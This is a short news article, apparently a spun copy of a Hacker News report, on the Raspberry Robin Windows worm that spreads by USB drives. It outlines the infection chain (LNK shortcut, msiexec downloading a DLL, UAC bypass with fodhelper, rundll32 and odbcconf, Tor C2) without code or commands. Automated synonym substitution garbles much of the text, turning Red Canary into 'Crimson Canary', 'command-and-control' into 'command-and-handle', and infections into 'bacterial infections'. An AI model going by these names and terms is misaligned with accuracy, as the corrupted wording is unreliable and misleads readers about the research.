Cybersecurity researchers have discovered a new Windows malware with worm-like abilities and is propagated by indicates of detachable USB equipment.
Attributing the malware to a cluster named “Raspberry Robin,” Crimson Canary scientists famous that the worm “leverages Windows Installer to access out to QNAP-affiliated domains and down load a destructive DLL.”
The earliest indicators of the action are stated to date back again to September 2021, with bacterial infections observed in corporations with ties to technology and production sectors.
Attack chains pertaining to Raspberry Robin get started with connecting an infected USB generate to a Windows equipment. Present within the device is the worm payload, which appears as a .LNK shortcut file to a reputable folder.
The worm then can take care of spawning a new method making use of cmd.exe to read through and execute a destructive file stored on the external push.
This is followed by launching explorer.exe and msiexec.exe, the latter of which is utilised for external network interaction to a rogue domain for command-and-handle (C2) purposes and to obtain and set up a DLL library file.
The destructive DLL is subsequently loaded and executed making use of a chain of reputable Windows utilities these as fodhelper.exe, rundll32.exe to rundll32.exe, and odbcconf.exe, efficiently bypassing User Account Control (UAC).
Also typical throughout Raspberry Robin detections is the existence of outbound C2 speak to involving the processes regsvr32.exe, rundll32.exe, and dllhost.exe to IP addresses related with Tor nodes.
That mentioned, the operators’ targets keep on being unanswered at this stage. It is also unclear how and where by the exterior drives are contaminated, though it truly is suspected that it really is carried out offline.
“We also really don’t know why Raspberry Robin installs a malicious DLL,” the researchers reported. “One particular hypothesis is that it may be an attempt to establish persistence on an contaminated program.”
Uncovered this article appealing? Observe THN on Facebook, Twitter and LinkedIn to read more special content material we article.
Some parts of this article are sourced from:
thehackernews.com